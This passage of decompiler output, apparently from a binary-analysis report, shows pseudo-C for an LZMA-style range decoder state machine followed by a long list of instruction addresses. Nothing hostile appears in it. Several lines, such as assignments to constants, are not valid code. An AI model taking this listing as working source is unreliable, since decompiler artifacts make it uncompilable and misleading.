                                                							__eflags =  *_t203;
                                                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							L60:
                                                							__eflags = __ebx - 0x100;
                                                							if(__ebx >= 0x100) {
                                                								L55:
                                                								__al =  *(__ebp - 0x44);
                                                								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                								goto L56;
                                                							}
                                                							L61:
                                                							__eax =  *(__ebp - 0x58);
                                                							__edx = __ebx + __ebx;
                                                							__ecx =  *(__ebp - 0x10);
                                                							__esi = __edx + __eax;
                                                							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                							__ax =  *__esi;
                                                							 *(__ebp - 0x54) = __esi;
                                                							__edi = __ax & 0x0000ffff;
                                                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                							__eflags =  *(__ebp - 0xc) - __ecx;
                                                							if( *(__ebp - 0xc) >= __ecx) {
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                								__cx = __ax;
                                                								_t217 = __edx + 1; // 0x1
                                                								__ebx = _t217;
                                                								__cx = __ax >> 5;
                                                								__eflags = __eax;
                                                								 *__esi = __ax;
                                                							} else {
                                                								 *(__ebp - 0x10) = __ecx;
                                                								0x800 = 0x800 - __edi;
                                                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                								__ebx = __ebx + __ebx;
                                                								 *__esi = __cx;
                                                							}
                                                							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                							 *(__ebp - 0x44) = __ebx;
                                                							if( *(__ebp - 0x10) >= 0x1000000) {
                                                								goto L60;
                                                							} else {
                                                								goto L58;
                                                							}
                                                						case 0x10:
                                                							L109:
                                                							__eflags =  *(__ebp - 0x6c);
                                                							if( *(__ebp - 0x6c) == 0) {
                                                								 *(__ebp - 0x88) = 0x10;
                                                								goto L170;
                                                							}
                                                							__ecx =  *(__ebp - 0x70);
                                                							__eax =  *(__ebp - 0xc);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							_t365 = __ebp - 0x70;
                                                							 *_t365 =  *(__ebp - 0x70) + 1;
                                                							__eflags =  *_t365;
                                                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							goto L111;
                                                						case 0x11:
                                                							goto L69;
                                                						case 0x12:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__eax =  *(__ebp - 0x58);
                                                								 *(__ebp - 0x84) = 0x13;
                                                								__esi =  *(__ebp - 0x58) + 2;
                                                								goto L132;
                                                							}
                                                							__eax =  *(__ebp - 0x4c);
                                                							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                							__ecx =  *(__ebp - 0x58);
                                                							__eax =  *(__ebp - 0x4c) << 4;
                                                							__eflags = __eax;
                                                							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                							goto L130;
                                                						case 0x13:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								_t469 = __ebp - 0x58;
                                                								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                								__eflags =  *_t469;
                                                								 *(__ebp - 0x30) = 0x10;
                                                								 *(__ebp - 0x40) = 8;
                                                								L144:
                                                								 *(__ebp - 0x7c) = 0x14;
                                                								goto L145;
                                                							}
                                                							__eax =  *(__ebp - 0x4c);
                                                							__ecx =  *(__ebp - 0x58);
                                                							__eax =  *(__ebp - 0x4c) << 4;
                                                							 *(__ebp - 0x30) = 8;
                                                							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                							L130:
                                                							 *(__ebp - 0x58) = __eax;
                                                							 *(__ebp - 0x40) = 3;
                                                							goto L144;
                                                						case 0x14:
                                                							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                							__eax =  *(__ebp - 0x80);
                                                							goto L140;
                                                						case 0x15:
                                                							__eax = 0;
                                                							__eflags =  *(__ebp - 0x38) - 7;
                                                							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                							__al = __al & 0x000000fd;
                                                							__eax = (__eflags >= 0) - 1 + 0xb;
                                                							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                							goto L120;
                                                						case 0x16:
                                                							__eax =  *(__ebp - 0x30);
                                                							__eflags = __eax - 4;
                                                							if(__eax >= 4) {
                                                								_push(3);
                                                								_pop(__eax);
                                                							}
                                                							__ecx =  *(__ebp - 4);
                                                							 *(__ebp - 0x40) = 6;
                                                							__eax = __eax << 7;
                                                							 *(__ebp - 0x7c) = 0x19;
                                                							 *(__ebp - 0x58) = __eax;
                                                							goto L145;
                                                						case 0x17:
                                                							L145:
                                                							__eax =  *(__ebp - 0x40);
                                                							 *(__ebp - 0x50) = 1;
                                                							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                							goto L149;
                                                						case 0x18:
                                                							L146:
                                                							__eflags =  *(__ebp - 0x6c);
                                                							if( *(__ebp - 0x6c) == 0) {
                                                								 *(__ebp - 0x88) = 0x18;
                                                								goto L170;
                                                							}
                                                							__ecx =  *(__ebp - 0x70);
                                                							__eax =  *(__ebp - 0xc);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							_t484 = __ebp - 0x70;
                                                							 *_t484 =  *(__ebp - 0x70) + 1;
                                                							__eflags =  *_t484;
                                                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							L148:
                                                							_t487 = __ebp - 0x48;
                                                							 *_t487 =  *(__ebp - 0x48) - 1;
                                                							__eflags =  *_t487;
                                                							L149:
                                                							__eflags =  *(__ebp - 0x48);
                                                							if( *(__ebp - 0x48) <= 0) {
                                                								__ecx =  *(__ebp - 0x40);
                                                								__ebx =  *(__ebp - 0x50);
                                                								0 = 1;
                                                								__eax = 1 << __cl;
                                                								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                								__eax =  *(__ebp - 0x7c);
                                                								 *(__ebp - 0x44) = __ebx;
                                                								goto L140;
                                                							}
                                                							__eax =  *(__ebp - 0x50);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                							__eax =  *(__ebp - 0x58);
                                                							__esi = __edx + __eax;
                                                							 *(__ebp - 0x54) = __esi;
                                                							__ax =  *__esi;
                                                							__edi = __ax & 0x0000ffff;
                                                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                							__eflags =  *(__ebp - 0xc) - __ecx;
                                                							if( *(__ebp - 0xc) >= __ecx) {
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                								__cx = __ax;
                                                								__cx = __ax >> 5;
                                                								__eax = __eax - __ecx;
                                                								__edx = __edx + 1;
                                                								__eflags = __edx;
                                                								 *__esi = __ax;
                                                								 *(__ebp - 0x50) = __edx;
                                                							} else {
                                                								 *(__ebp - 0x10) = __ecx;
                                                								0x800 = 0x800 - __edi;
                                                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                								 *__esi = __cx;
                                                							}
                                                							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                							if( *(__ebp - 0x10) >= 0x1000000) {
                                                								goto L148;
                                                							} else {
                                                								goto L146;
                                                							}
                                                						case 0x19:
                                                							__eflags = __ebx - 4;
                                                							if(__ebx < 4) {
                                                								 *(__ebp - 0x2c) = __ebx;
                                                								L119:
                                                								_t393 = __ebp - 0x2c;
                                                								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                								__eflags =  *_t393;
                                                								L120:
                                                								__eax =  *(__ebp - 0x2c);
                                                								__eflags = __eax;
                                                								if(__eax == 0) {
                                                									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                									goto L170;
                                                								}
                                                								__eflags = __eax -  *(__ebp - 0x60);
                                                								if(__eax >  *(__ebp - 0x60)) {
                                                									goto L171;
                                                								}
                                                								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                								__eax =  *(__ebp - 0x30);
                                                								_t400 = __ebp - 0x60;
                                                								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                								__eflags =  *_t400;
                                                								goto L123;
                                                							}
                                                							__ecx = __ebx;
                                                							__eax = __ebx;
                                                							__ecx = __ebx >> 1;
                                                							__eax = __ebx & 0x00000001;
                                                							__ecx = (__ebx >> 1) - 1;
                                                							__al = __al | 0x00000002;
                                                							__eax = (__ebx & 0x00000001) << __cl;
                                                							__eflags = __ebx - 0xe;
                                                							 *(__ebp - 0x2c) = __eax;
                                                							if(__ebx >= 0xe) {
                                                								__ebx = 0;
                                                								 *(__ebp - 0x48) = __ecx;
                                                								L102:
                                                								__eflags =  *(__ebp - 0x48);
                                                								if( *(__ebp - 0x48) <= 0) {
                                                									__eax = __eax + __ebx;
                                                									 *(__ebp - 0x40) = 4;
                                                									 *(__ebp - 0x2c) = __eax;
                                                									__eax =  *(__ebp - 4);
                                                									__eax =  *(__ebp - 4) + 0x644;
                                                									__eflags = __eax;
                                                									L108:
                                                									__ebx = 0;
                                                									 *(__ebp - 0x58) = __eax;
                                                									 *(__ebp - 0x50) = 1;
                                                									 *(__ebp - 0x44) = 0;
                                                									 *(__ebp - 0x48) = 0;
                                                									L112:
                                                									__eax =  *(__ebp - 0x40);
                                                									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                										_t391 = __ebp - 0x2c;
                                                										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                										__eflags =  *_t391;
                                                										goto L119;
                                                									}
                                                									__eax =  *(__ebp - 0x50);
                                                									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                									__eax =  *(__ebp - 0x58);
                                                									__esi = __edi + __eax;
                                                									 *(__ebp - 0x54) = __esi;
                                                									__ax =  *__esi;
                                                									__ecx = __ax & 0x0000ffff;
                                                									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                									__eflags =  *(__ebp - 0xc) - __edx;
                                                									if( *(__ebp - 0xc) >= __edx) {
                                                										__ecx = 0;
                                                										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                										__ecx = 1;
                                                										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                										__ebx = 1;
                                                										__ecx =  *(__ebp - 0x48);
                                                										__ebx = 1 << __cl;
                                                										__ecx = 1 << __cl;
                                                										__ebx =  *(__ebp - 0x44);
                                                										__ebx =  *(__ebp - 0x44) | __ecx;
                                                										__cx = __ax;
                                                										__cx = __ax >> 5;
                                                										__eax = __eax - __ecx;
                                                										__edi = __edi + 1;
                                                										__eflags = __edi;
                                                										 *(__ebp - 0x44) = __ebx;
                                                										 *__esi = __ax;
                                                										 *(__ebp - 0x50) = __edi;
                                                									} else {
                                                										 *(__ebp - 0x10) = __edx;
                                                										0x800 = 0x800 - __ecx;
                                                										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                										 *__esi = __dx;
                                                									}
                                                									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                									if( *(__ebp - 0x10) >= 0x1000000) {
                                                										L111:
                                                										_t368 = __ebp - 0x48;
                                                										 *_t368 =  *(__ebp - 0x48) + 1;
                                                										__eflags =  *_t368;
                                                										goto L112;
                                                									} else {
                                                										goto L109;
                                                									}
                                                								}
                                                								__ecx =  *(__ebp - 0xc);
                                                								__ebx = __ebx + __ebx;
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                								 *(__ebp - 0x44) = __ebx;
                                                								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                									__ecx =  *(__ebp - 0x10);
                                                									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                									__ebx = __ebx | 0x00000001;
                                                									__eflags = __ebx;
                                                									 *(__ebp - 0x44) = __ebx;
                                                								}
                                                								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                								if( *(__ebp - 0x10) >= 0x1000000) {
                                                									L101:
                                                									_t338 = __ebp - 0x48;
                                                									 *_t338 =  *(__ebp - 0x48) - 1;
                                                									__eflags =  *_t338;
                                                									goto L102;
                                                								} else {
                                                									goto L99;
                                                								}
                                                							}
                                                							__edx =  *(__ebp - 4);
                                                							__eax = __eax - __ebx;
                                                							 *(__ebp - 0x40) = __ecx;
                                                							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                							goto L108;
                                                						case 0x1a:
                                                							L56:
                                                							__eflags =  *(__ebp - 0x64);
                                                							if( *(__ebp - 0x64) == 0) {
                                                								 *(__ebp - 0x88) = 0x1a;
                                                								goto L170;
                                                							}
                                                							__ecx =  *(__ebp - 0x68);
                                                							__al =  *(__ebp - 0x5c);
                                                							__edx =  *(__ebp - 8);
                                                							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                							 *( *(__ebp - 0x68)) = __al;
                                                							__ecx =  *(__ebp - 0x14);
                                                							 *(__ecx +  *(__ebp - 8)) = __al;
                                                							__eax = __ecx + 1;
                                                							__edx = 0;
                                                							_t192 = __eax %  *(__ebp - 0x74);
                                                							__eax = __eax /  *(__ebp - 0x74);
                                                							__edx = _t192;
                                                							goto L79;
                                                						case 0x1b:
                                                							goto L75;
                                                						case 0x1c:
                                                							while(1) {
                                                								L123:
                                                								__eflags =  *(__ebp - 0x64);
                                                								if( *(__ebp - 0x64) == 0) {
                                                									break;
                                                								}
                                                								__eax =  *(__ebp - 0x14);
                                                								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                								__eflags = __eax -  *(__ebp - 0x74);
                                                								if(__eax >=  *(__ebp - 0x74)) {
                                                									__eax = __eax +  *(__ebp - 0x74);
                                                									__eflags = __eax;
                                                								}
                                                								__edx =  *(__ebp - 8);
                                                								__cl =  *(__eax + __edx);
                                                								__eax =  *(__ebp - 0x14);
                                                								 *(__ebp - 0x5c) = __cl;
                                                								 *(__eax + __edx) = __cl;
                                                								__eax = __eax + 1;
                                                								__edx = 0;
                                                								_t414 = __eax %  *(__ebp - 0x74);
                                                								__eax = __eax /  *(__ebp - 0x74);
                                                								__edx = _t414;
                                                								__eax =  *(__ebp - 0x68);
                                                								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                								__eflags =  *(__ebp - 0x30);
                                                								 *( *(__ebp - 0x68)) = __cl;
                                                								 *(__ebp - 0x14) = _t414;
                                                								if( *(__ebp - 0x30) > 0) {
                                                									continue;
                                                								} else {
                                                									goto L80;
                                                								}
                                                							}
                                                							 *(__ebp - 0x88) = 0x1c;
                                                							goto L170;
                                                					}
                                                				}
                                                			}













                                                0x00000000
                                                0x00406c26
                                                0x00406c26
                                                0x00406c2a
                                                0x00406ce1
                                                0x00406ce4
                                                0x00406cf0
                                                0x00406bd1
                                                0x00406bd1
                                                0x00406bd4
                                                0x00406f46
                                                0x00406f46
                                                0x00406f49
                                                0x00406f49
                                                0x00406f4f
                                                0x00406f55
                                                0x00406f5b
                                                0x00406f75
                                                0x00406f78
                                                0x00406f7e
                                                0x00406f89
                                                0x00406f8b
                                                0x00406f5d
                                                0x00406f5d
                                                0x00406f6c
                                                0x00406f70
                                                0x00406f70
                                                0x00406f95
                                                0x00406fbc
                                                0x00406fbc
                                                0x00406fc2
                                                0x00406fc2
                                                0x00000000
                                                0x00406f97
                                                0x00406f97
                                                0x00406f9b
                                                0x0040714a
                                                0x00000000
                                                0x0040714a
                                                0x00406fa7
                                                0x00406fae
                                                0x00406fb6
                                                0x00406fb9
                                                0x00000000
                                                0x00406fb9
                                                0x00406c30
                                                0x00406c34
                                                0x00407175
                                                0x00407175
                                                0x00407178
                                                0x0040717c
                                                0x0040717c
                                                0x00406c3a
                                                0x00406c40
                                                0x00406c43
                                                0x00406c47
                                                0x00406c4a
                                                0x00406c4e
                                                0x00407114
                                                0x00407160
                                                0x00407168
                                                0x0040716f
                                                0x00407171
                                                0x00000000
                                                0x00407171
                                                0x00406c54
                                                0x00406c57
                                                0x00406c5d
                                                0x00406c5f
                                                0x00406c5f
                                                0x00406c62
                                                0x00406c65
                                                0x00406c68
                                                0x00406c6b
                                                0x00406c6e
                                                0x00406c71
                                                0x00406c72
                                                0x00406c74
                                                0x00406c74
                                                0x00406c74
                                                0x00406c77
                                                0x00406c7a
                                                0x00406c7d
                                                0x00406c80
                                                0x00406c80
                                                0x00406c83
                                                0x00406c85
                                                0x00406c85
                                                0x00406c88
                                                0x00406c88
                                                0x00406c88
                                                0x0040675e
                                                0x0040675e
                                                0x00406767
                                                0x00000000
                                                0x00000000
                                                0x0040676d
                                                0x00000000
                                                0x00406778
                                                0x00000000
                                                0x00000000
                                                0x00406781
                                                0x00406784
                                                0x00406787
                                                0x0040678b
                                                0x00000000
                                                0x00000000
                                                0x00406791
                                                0x00406794
                                                0x00406796
                                                0x00406797
                                                0x0040679a
                                                0x0040679c
                                                0x0040679d
                                                0x0040679f
                                                0x004067a2
                                                0x004067a7
                                                0x004067ac
                                                0x004067b5
                                                0x004067c8
                                                0x004067cb
                                                0x004067d7
                                                0x004067ff
                                                0x00406801
                                                0x0040680f
                                                0x0040680f
                                                0x00406813
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406803
                                                0x00406803
                                                0x00406806
                                                0x00406807
                                                0x00406807
                                                0x00000000
                                                0x00406803
                                                0x004067dd
                                                0x004067e2
                                                0x004067e2
                                                0x004067eb
                                                0x004067f3
                                                0x004067f6
                                                0x00000000
                                                0x004067fc
                                                0x004067fc
                                                0x00000000
                                                0x004067fc
                                                0x00000000
                                                0x00406819
                                                0x00406819
                                                0x0040681d
                                                0x004070c9
                                                0x00000000
                                                0x004070c9
                                                0x00406826
                                                0x00406836
                                                0x00406839
                                                0x0040683c
                                                0x0040683c
                                                0x0040683c
                                                0x0040683f
                                                0x00406843
                                                0x00000000
                                                0x00000000
                                                0x00406845
                                                0x0040684b
                                                0x00406875
                                                0x0040687b
                                                0x00406882
                                                0x00000000
                                                0x00406882
                                                0x00406851
                                                0x00406854
                                                0x00406859
                                                0x00406859
                                                0x00406864
                                                0x0040686c
                                                0x0040686f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004068b4
                                                0x004068ba
                                                0x004068bd
                                                0x004068ca
                                                0x004068d2
                                                0x00000000
                                                0x00000000
                                                0x00406889
                                                0x00406889
                                                0x0040688d
                                                0x004070d8
                                                0x00000000
                                                0x004070d8
                                                0x00406899
                                                0x004068a4
                                                0x004068a4
                                                0x004068a4
                                                0x004068a7
                                                0x004068aa
                                                0x004068ad
                                                0x004068b2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004068da
                                                0x004068dc
                                                0x004068df
                                                0x00406950
                                                0x00406953
                                                0x00406956
                                                0x0040695d
                                                0x00406967
                                                0x00000000
                                                0x00406967
                                                0x004068e1
                                                0x004068e5
                                                0x004068e8
                                                0x004068ea
                                                0x004068ed
                                                0x004068f0
                                                0x004068f2
                                                0x004068f5
                                                0x004068f7
                                                0x004068fc
                                                0x004068ff
                                                0x00406902
                                                0x00406906
                                                0x0040690d
                                                0x00406910
                                                0x00406917
                                                0x0040691b
                                                0x00406923
                                                0x00406923
                                                0x00406923
                                                0x0040691d
                                                0x0040691d
                                                0x0040691d
                                                0x00406912
                                                0x00406912
                                                0x00406912
                                                0x00406927
                                                0x0040692a
                                                0x00406948
                                                0x0040694a
                                                0x00000000
                                                0x0040692c
                                                0x0040692c
                                                0x0040692f
                                                0x00406932
                                                0x00406935
                                                0x00406937
                                                0x00406937
                                                0x00406937
                                                0x0040693a
                                                0x0040693d
                                                0x0040693f
                                                0x00406940
                                                0x00406943
                                                0x00000000
                                                0x00406943
                                                0x00000000
                                                0x00406b79
                                                0x00406b7d
                                                0x00406b9b
                                                0x00406b9e
                                                0x00406ba5
                                                0x00406ba8
                                                0x00406bab
                                                0x00406bae
                                                0x00406bb1
                                                0x00406bb4
                                                0x00406bb6
                                                0x00406bbd
                                                0x00406bbe
                                                0x00406bc0
                                                0x00406bc3
                                                0x00406bc6
                                                0x00406bc9
                                                0x00406bc9
                                                0x00406bce
                                                0x00000000
                                                0x00406bce
                                                0x00406b7f
                                                0x00406b82
                                                0x00406b85
                                                0x00406b8f
                                                0x00000000
                                                0x00000000
                                                0x00406be3
                                                0x00406be7
                                                0x00406c0a
                                                0x00406c0d
                                                0x00406c10
                                                0x00406c1a
                                                0x00406be9
                                                0x00406be9
                                                0x00406bec
                                                0x00406bef
                                                0x00406bf2
                                                0x00406bff
                                                0x00406c02
                                                0x00406c02
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406c97
                                                0x00406c9b
                                                0x00406ca2
                                                0x00406ca5
                                                0x00406ca8
                                                0x00406cb2
                                                0x00000000
                                                0x00406cb2
                                                0x00406c9d
                                                0x00000000
                                                0x00000000
                                                0x00406cbe
                                                0x00406cc2
                                                0x00406cc9
                                                0x00406ccc
                                                0x00406ccf
                                                0x00406cc4
                                                0x00406cc4
                                                0x00406cc4
                                                0x00406cd2
                                                0x00406cd5
                                                0x00406cd8
                                                0x00406cd8
                                                0x00406cdb
                                                0x00406cde
                                                0x00000000
                                                0x00000000
                                                0x00406d7e
                                                0x00406d7e
                                                0x00406d82
                                                0x00407120
                                                0x00000000
                                                0x00407120
                                                0x00406d88
                                                0x00406d8b
                                                0x00406d8e
                                                0x00406d92
                                                0x00406d95
                                                0x00406d9b
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406da0
                                                0x00406da3
                                                0x00000000
                                                0x00000000
                                                0x00406973
                                                0x00406973
                                                0x00406977
                                                0x004070e4
                                                0x00000000
                                                0x004070e4
                                                0x0040697d
                                                0x00406980
                                                0x00406983
                                                0x00406987
                                                0x0040698a
                                                0x00406990
                                                0x00406992
                                                0x00406992
                                                0x00406992
                                                0x00406995
                                                0x00406998
                                                0x00406998
                                                0x0040699b
                                                0x0040699e
                                                0x00000000
                                                0x00000000
                                                0x004069a4
                                                0x004069aa
                                                0x00000000
                                                0x00000000
                                                0x004069b0
                                                0x004069b0
                                                0x004069b4
                                                0x004069b7
                                                0x004069ba
                                                0x004069bd
                                                0x004069c0
                                                0x004069c1
                                                0x004069c4
                                                0x004069c6
                                                0x004069cc
                                                0x004069cf
                                                0x004069d2
                                                0x004069d5
                                                0x004069d8
                                                0x004069db
                                                0x004069de
                                                0x004069fa
                                                0x004069fd
                                                0x00406a00
                                                0x00406a03
                                                0x00406a0a
                                                0x00406a0e
                                                0x00406a10
                                                0x00406a14
                                                0x004069e0
                                                0x004069e0
                                                0x004069e4
                                                0x004069ec
                                                0x004069f1
                                                0x004069f3
                                                0x004069f5
                                                0x004069f5
                                                0x00406a17
                                                0x00406a1e
                                                0x00406a21
                                                0x00000000
                                                0x00406a27
                                                0x00000000
                                                0x00406a27
                                                0x00000000
                                                0x00406a2c
                                                0x00406a2c
                                                0x00406a30
                                                0x004070f0
                                                0x00000000
                                                0x004070f0
                                                0x00406a36
                                                0x00406a39
                                                0x00406a3c
                                                0x00406a40
                                                0x00406a43
                                                0x00406a49
                                                0x00406a4b
                                                0x00406a4b
                                                0x00406a4b
                                                0x00406a4e
                                                0x00406a51
                                                0x00406a51
                                                0x00406a51
                                                0x00406a57
                                                0x00000000
                                                0x00000000
                                                0x00406a59
                                                0x00406a5c
                                                0x00406a5f
                                                0x00406a62
                                                0x00406a65
                                                0x00406a68
                                                0x00406a6b
                                                0x00406a6e
                                                0x00406a71
                                                0x00406a74
                                                0x00406a77
                                                0x00406a8f
                                                0x00406a92
                                                0x00406a95
                                                0x00406a98
                                                0x00406a98
                                                0x00406a9b
                                                0x00406a9f
                                                0x00406aa1
                                                0x00406a79
                                                0x00406a79
                                                0x00406a81
                                                0x00406a86
                                                0x00406a88
                                                0x00406a8a
                                                0x00406a8a
                                                0x00406aa4
                                                0x00406aab
                                                0x00406aae
                                                0x00000000
                                                0x00406ab0
                                                0x00000000
                                                0x00406ab0
                                                0x00406aae
                                                0x00406ab5
                                                0x00406ab5
                                                0x00406ab5
                                                0x00406ab5
                                                0x00000000
                                                0x00000000
                                                0x00406af0
                                                0x00406af0
                                                0x00406af4
                                                0x004070fc
                                                0x00000000
                                                0x004070fc
                                                0x00406afa
                                                0x00406afd
                                                0x00406b00
                                                0x00406b04
                                                0x00406b07
                                                0x00406b0d
                                                0x00406b0f
                                                0x00406b0f
                                                0x00406b0f
                                                0x00406b12
                                                0x00406b15
                                                0x00406b15
                                                0x00406b1b
                                                0x00406ab9
                                                0x00406ab9
                                                0x00406abc
                                                0x00000000
                                                0x00406abc
                                                0x00406b1d
                                                0x00406b1d
                                                0x00406b20
                                                0x00406b23
                                                0x00406b26
                                                0x00406b29
                                                0x00406b2c
                                                0x00406b2f
                                                0x00406b32
                                                0x00406b35
                                                0x00406b38
                                                0x00406b3b
                                                0x00406b53
                                                0x00406b56
                                                0x00406b59
                                                0x00406b5c
                                                0x00406b5c
                                                0x00406b5f
                                                0x00406b63
                                                0x00406b65
                                                0x00406b3d
                                                0x00406b3d
                                                0x00406b45
                                                0x00406b4a
                                                0x00406b4c
                                                0x00406b4e
                                                0x00406b4e
                                                0x00406b68
                                                0x00406b6f
                                                0x00406b72
                                                0x00000000
                                                0x00406b74
                                                0x00000000
                                                0x00406b74
                                                0x00000000
                                                0x00406e01
                                                0x00406e01
                                                0x00406e05
                                                0x0040712c
                                                0x00000000
                                                0x0040712c
                                                0x00406e0b
                                                0x00406e0e
                                                0x00406e11
                                                0x00406e15
                                                0x00406e18
                                                0x00406e1e
                                                0x00406e20
                                                0x00406e20
                                                0x00406e20
                                                0x00406e23
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f10
                                                0x00406f14
                                                0x00406f36
                                                0x00406f39
                                                0x00406f43
                                                0x00000000
                                                0x00406f43
                                                0x00406f16
                                                0x00406f19
                                                0x00406f1d
                                                0x00406f20
                                                0x00406f20
                                                0x00406f23
                                                0x00000000
                                                0x00000000
                                                0x00406fcd
                                                0x00406fd1
                                                0x00406fef
                                                0x00406fef
                                                0x00406fef
                                                0x00406ff6
                                                0x00406ffd
                                                0x00407004
                                                0x00407004
                                                0x00000000
                                                0x00407004
                                                0x00406fd3
                                                0x00406fd6
                                                0x00406fd9
                                                0x00406fdc
                                                0x00406fe3
                                                0x00406f27
                                                0x00406f27
                                                0x00406f2a
                                                0x00000000
                                                0x00000000
                                                0x004070be
                                                0x004070c1
                                                0x00000000
                                                0x00000000
                                                0x00406cf8
                                                0x00406cfa
                                                0x00406d01
                                                0x00406d02
                                                0x00406d04
                                                0x00406d07
                                                0x00000000
                                                0x00000000
                                                0x00406d0f
                                                0x00406d12
                                                0x00406d15
                                                0x00406d17
                                                0x00406d19
                                                0x00406d19
                                                0x00406d1a
                                                0x00406d1d
                                                0x00406d24
                                                0x00406d27
                                                0x00406d35
                                                0x00000000
                                                0x00000000
                                                0x0040700b
                                                0x0040700b
                                                0x0040700e
                                                0x00407015
                                                0x00000000
                                                0x00000000
                                                0x0040701a
                                                0x0040701a
                                                0x0040701e
                                                0x00407156
                                                0x00000000
                                                0x00407156
                                                0x00407024
                                                0x00407027
                                                0x0040702a
                                                0x0040702e
                                                0x00407031
                                                0x00407037
                                                0x00407039
                                                0x00407039
                                                0x00407039
                                                0x0040703c
                                                0x0040703f
                                                0x0040703f
                                                0x0040703f
                                                0x0040703f
                                                0x00407042
                                                0x00407042
                                                0x00407046
                                                0x004070a6
                                                0x004070a9
                                                0x004070ae
                                                0x004070af
                                                0x004070b1
                                                0x004070b3
                                                0x004070b6
                                                0x00000000
                                                0x004070b6
                                                0x00407048
                                                0x0040704e
                                                0x00407051
                                                0x00407054
                                                0x00407057
                                                0x0040705a
                                                0x0040705d
                                                0x00407060
                                                0x00407063
                                                0x00407066
                                                0x00407069
                                                0x00407082
                                                0x00407085
                                                0x00407088
                                                0x0040708b
                                                0x0040708f
                                                0x00407091
